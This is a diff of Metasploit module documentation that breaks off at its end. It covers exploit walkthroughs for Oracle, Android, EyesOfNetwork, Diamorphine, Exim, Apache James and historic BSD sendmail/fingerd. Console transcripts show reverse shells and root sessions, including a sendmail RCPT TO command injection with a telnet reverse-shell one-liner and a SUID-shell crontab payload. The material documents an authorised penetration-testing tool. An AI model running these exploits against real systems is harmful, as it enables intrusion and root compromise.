-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
-----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```

documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
 
 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).

documentation/modules/auxiliary/scanner/oracle/oracle_login.md

@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+This module attempts to authenticate against an Oracle RDBMS instance using username and password
+combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. The default wordlist
+is [oracle_default_userpass.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/oracle_default_userpass.txt).
+
+Default port for SQL*Net listener is 1521/tcp. If this port is open, try this module to login.
+
+### Install
+
+This module needs nmap 5.50 or above to function.  However due to an [nmap bug](https://github.com/nmap/nmap/issues/1475) versions
+6.50-7.80 may not work.
+
+```
+nmap -V
+apt-get install nmap
+```
+
+In addition, if you encounter errors due to OCI libraries not being found, please see the
+[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
+
+For Oracle Server, please follow the following
+[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).
+
+## Verification Steps
+
+  1. Install Oracle Database server and metasploit components
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/oracle/oracle_login```
+  4. Do: ```run```
+
+## Options
+
+  **BLANK_PASSWORDS**
+
+  Try blank passwords for all users
+
+  **BRUTEFORCE_SPEED**
+
+  How fast to bruteforce, scale of 0 to 5
+
+  **DB_ALL_CREDS**
+
+  Try each user/password couple stored in the current database
+
+  **DB_ALL_PASS**
+
+  Add all passwords in the current database to the list to try
+
+  **DB_ALL_USERS**
+
+  Add all users in the current database to the list to try
+
+  **NMAP_VERBOSE**
+
+  Display nmap output
+
+  **PASSWORD**
+
+  Specify one password to use for all usernames
+
+  **PASS_FILE**
+
+  File of passwords, one per line.
+
+  **RHOSTS**
+
+  Target hosts, range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+  **RPORTS**
+
+  Ports of the target
+
+  **SID**
+
+  Instance (SID) to authenticate against. Default `XE`
+
+  **STOP_ON_SUCCESS**
+
+  Stop the bruteforce attack when a valid combination is found
+
+  **THREADS**
+
+  Number of concurrent threads (max of one per host)
+
+  **USERNAME**
+
+  Specific username to try for all passwords
+
+  **USERPASS_FILE**
+
+  File of username and passwords, separated by space, one set per line. Default `oracle_default_userpass.txt`
+
+  **USER_AS_PASS**
+
+  Try the username as the password for all users
+
+  **USER_FILE**
+
+  File containing usernames, one per line
+
+## Scenarios
+
+Unfortunately due to the nmap bug mentioned above, it was not possible to create an example run.

documentation/modules/exploit/android/local/binder_uaf.md

@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+This exploit module currently targets a very specific build of Android on specific set of hardware targets:
+
+ - Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
+
+This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
+
+One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
+
+## Verification Steps
+
+ - Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
+
+ `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
+
+ - Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
+
+```
+uname -a
+Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+```
+
+ - Run the exploit:
+
+```
+msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
+msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
+msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
+LPORT => 4448
+msf5 exploit(android/local/binder_uaf) > set SESSION -1
+SESSION => -1
+msf5 exploit(android/local/binder_uaf) > run
+```
+
+ - **Verify** the new session can read and write private application data (in /data/data/..../)
+
+## Scenarios
+
+This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.

documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md

@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description
 
 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
 
-## Setup
+### Setup
 
 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-## Targets
+### Targets
 
 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```
 
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options
 
 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.
 
 **PAYLOAD**
 
-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.
 
-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD
 
 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
 
 Module options (exploit/bsd/finger/morris_fingerd_bof):
 
    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 
 
 Payload options (bsd/vax/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)
 
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run
 
-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
 
-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986
 

documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md

@@ -0,0 +1,70 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+
+The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+
+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set payload [payload]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Options
+1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+
+## Scenarios
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
+
+Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        443              yes       The target port (TCP)
+   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path to EyesOfNetwork
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
+[+] Authenticated as user kY7Qn1gr8L
+[*] Sending payload (428 bytes) ...
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+## References
+1. <https://www.exploit-db.com/exploits/48025>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
+3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
+4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
+5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>

documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md

@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+
+  This module uses Diamorphine rootkit's privesc feature using signal
+  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+  This module has been tested successfully with Diamorphine from `master`
+  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SIGNAL**
+
+  Diamorphine elevate signal. (default: `64`)
+
+
+## Scenarios
+
+### Linux Mint 19 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
+
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
+  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.228
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.228
+  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+

documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md

@@ -2,7 +2,7 @@
 
 Exim 4.87 - 4.91 Local Privilege Escalation
 
-This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
 
 Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.
 
@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
 ## ForceExploit
 
 Force exploit even if the current session is root.
-    
-## SendExpectTimeout
 
-Timeout per send/expect when communicating with exim.
+## ExpectTimeout
+
+Timeout for Expect when communicating with exim.
 
 ## WritableDir
 
@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
 ```
 meterpreter > getuid
 Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > 
-Background session 1? [y/N]  
-msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+meterpreter >
+Background session 1? [y/N]
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
 session => 1
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
 [*] The target appears to be vulnerable.
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
 
-[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Started reverse TCP handler on 192.168.0.50:13371
 [*] Payload sent, wait a few seconds...
 [*] Sending stage (985320 bytes) to 192.168.0.80
 [*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100

documentation/modules/exploit/linux/smtp/apache_james_exec.md

@@ -0,0 +1,155 @@
+## Vulnerable Application
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
+  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
+  Instructions for installing the vulnerable application for testing can be found here:
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
+
+## Verification Steps
+  __1.__ Start msfconsole
+
+  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec
+
+  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport
+
+  __4.__ DO: Set the preferred payload
+
+  __5.__ DO: Run the check method to determine vulnerability
+
+  __6.__ DO: Run the exploit
+
+  __7.__ The payload will connect to the listener if the exploit is successful
+
+## Options
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+
+  **RHOSTS:**  The IP address of the vulnerable server.
+
+  **RPORT:**  The port number of the SMTP service.
+
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
+
+## Scenarios
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
+  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
+  mail objects.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
+  rhosts =>  192.168.224.169
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
+  [*] Sending stage (3021284 bytes) to 192.168.224.169
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
+  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
+
+  meterpreter >
+```
+
+  ---------------------------------------------------------------------------------------------
+  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
+  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
+  /etc/bash_completion.d directory and the malicious user account.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
+  rhosts => 192.168.224.164
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
+```
+
+  __5.__ Set up and run listener (Can be done before running exploit):
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lport 4444
+  lport => 4444
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [*] Sending stage (3021284 bytes) to 192.168.224.164
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
+
+  meterpreter >
+```
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Bash Completion
+  1   Cron
+```
+
+## References
+  1. <https://www.exploit-db.com/exploits/35513>
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

documentation/modules/exploit/unix/local/emacs_movemail.md

@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description
 
 This module exploits a SUID installation of the Emacs `movemail` utility
 to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
+
 The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.
 
-## Setup
+### Setup
 
 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-## Targets
+### Targets
 
 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   /usr/lib/crontab.local
 ```
 
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options
 
 **MOVEMAIL**
@@ -34,15 +41,34 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
 SUID-root shell at `/tmp/sh`.
 
-## Usage
+## Scenarios
+
+### 4.3BSD
 
 ```
+msf5 > use exploit/unix/local/emacs_movemail
+msf5 exploit(unix/local/emacs_movemail) > show missing
+
+Module options (exploit/unix/local/emacs_movemail):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+msf5 exploit(unix/local/emacs_movemail) > set session -1
+session => -1
 msf5 exploit(unix/local/emacs_movemail) > run
 
 [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
-[*] Current shell is /bin/sh
+[-] Current shell is unknown
 [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
-[+] SUID-root [redacted] found
+[+] SUID-root /etc/movemail found
 [*] Preparing crontab with payload
 * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
 * * * * * root rm -f /usr/lib/crontab.local
@@ -50,12 +76,5 @@ msf5 exploit(unix/local/emacs_movemail) > run
 [+] Writing crontab to /usr/lib/crontab.local
 [!] Please wait at least one minute for effect
 [*] Exploit completed, but no session was created.
-msf5 exploit(unix/local/emacs_movemail) > sessions -1
-[*] Starting interaction with 1...
-
-ls -l /usr/lib/crontab.local /tmp/sh
-/usr/lib/crontab.local not found
--rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
-/tmp/sh -c whoami
-root
+msf5 exploit(unix/local/emacs_movemail) >
 ```

documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md

@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Description
 
 This module exploits `sendmail`'s well-known historical debug mode to
 escape to a shell and execute commands in the SMTP `RCPT TO` command.
@@ -6,7 +8,7 @@ escape to a shell and execute commands in the SMTP `RCPT TO` command.
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
 
-## Setup
+### Setup
 
 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -16,7 +18,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-## Targets
+### Targets
 
 ```
 Id  Name
@@ -24,6 +26,10 @@ Id  Name
 0   @(#)version.c       5.51 (Berkeley) 5/2/86
 ```
 
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options
 
 **RPORT**
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.
 
 **PAYLOAD**
 
-Set this to a Unix command payload. Currently only `cmd/unix/reverse`
+Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.
 
-## Usage
+## Scenarios
+
+### `sendmail` 5.51 on 4.3BSD
 
 ```
-msf5 exploit(unix/smtp/morris_sendmail_debug) > options
+msf5 > use exploit/unix/smtp/morris_sendmail_debug
+msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing
 
 Module options (exploit/unix/smtp/morris_sendmail_debug):
 
    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   25               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 
 
 Payload options (cmd/unix/reverse):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)version.c       5.51 (Berkeley) 5/2/86
-
+   LHOST                   yes       The listen address (an interface may be specified)
 
+msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(unix/smtp/morris_sendmail_debug) > run
 
-[*] Started reverse TCP double handler on 192.168.1.5:4444
+[*] Started reverse TCP double handler on 192.168.56.1:4444
 [*] 127.0.0.1:25 - Connecting to sendmail
 [*] 127.0.0.1:25 - Enabling debug mode and sending exploit
+[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
 [*] 127.0.0.1:25 - Sending: DEBUG
-[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
+[*] 127.0.0.1:25 - Expecting: /200 Debug set/
+[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
+[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
 [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
+[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
 [*] 127.0.0.1:25 - Sending: DATA
+[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
 [*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
 [*] 127.0.0.1:25 - Sending: export PATH
-[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
+[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
 [*] 127.0.0.1:25 - Sending: .
+[*] 127.0.0.1:25 - Expecting: /250 Ok/
 [*] 127.0.0.1:25 - Sending: QUIT
+[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[*] Command: echo zqhqKJD7trW0E0Lp;
+[*] Command: echo ISj759F8jEik4HAW;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "zqhqKJD7trW0E0Lp\r\n"
+[*] Reading from socket A
+[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
 [*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
+[*] B is input...
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
 [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you
 

documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a command injection in the `MAIL FROM` field during
